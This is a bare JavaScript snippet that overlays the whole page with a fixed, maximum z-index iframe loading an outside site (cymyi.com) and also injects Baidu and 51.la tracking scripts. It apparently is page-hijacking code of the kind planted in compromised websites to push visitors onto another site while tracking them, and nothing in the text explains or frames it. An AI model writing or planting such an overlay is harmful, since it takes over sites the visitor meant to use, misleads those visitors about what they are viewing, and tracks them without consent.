document.write('');
var iframe = document.createElement('iframe');
iframe.src = 'https://cymyi.com/';
iframe.scrolling = 'auto';
iframe.style.cssText = "width:100%;height:100%;left:1px;top:1px;border:none;background:#fff";
var div1 = document.createElement("div");
var div = document.createElement("div");
div1.style.cssText = "-webkit-overflow-scrolling:touch;width:100%;height:100%;z-index:9999999999;position:fixed;top:0;left:0;";
var is_mobi = navigator.userAgent.toLowerCase().match(/(ipad|iphone|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i) != null;
if (is_mobi) {
div1.style.overflow = "auto";
}
div1.appendChild(iframe);
div.appendChild(div1);
document.write(div.innerHTML);
var _hmt = _hmt || [];
(function() {
var hm = document.createElement("script");
hm.src = "https://hm.baidu.com/hm.js?b2024be07a23cd3c8d6b5ae6271881df";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(hm, s);
})();
(function() {
var laScript = document.createElement("script");
laScript.charset = "UTF-8";
laScript.id = "LA_COLLECT";
laScript.src = "//sdk.51.la/js-sdk-pro.min.js";
laScript.onload = function() {
LA.init({
id: "3IM25CsyPLvGCGGz",
ck: "3IM25CsyPLvGCGGz"
});
};
document.head.appendChild(laScript);
})();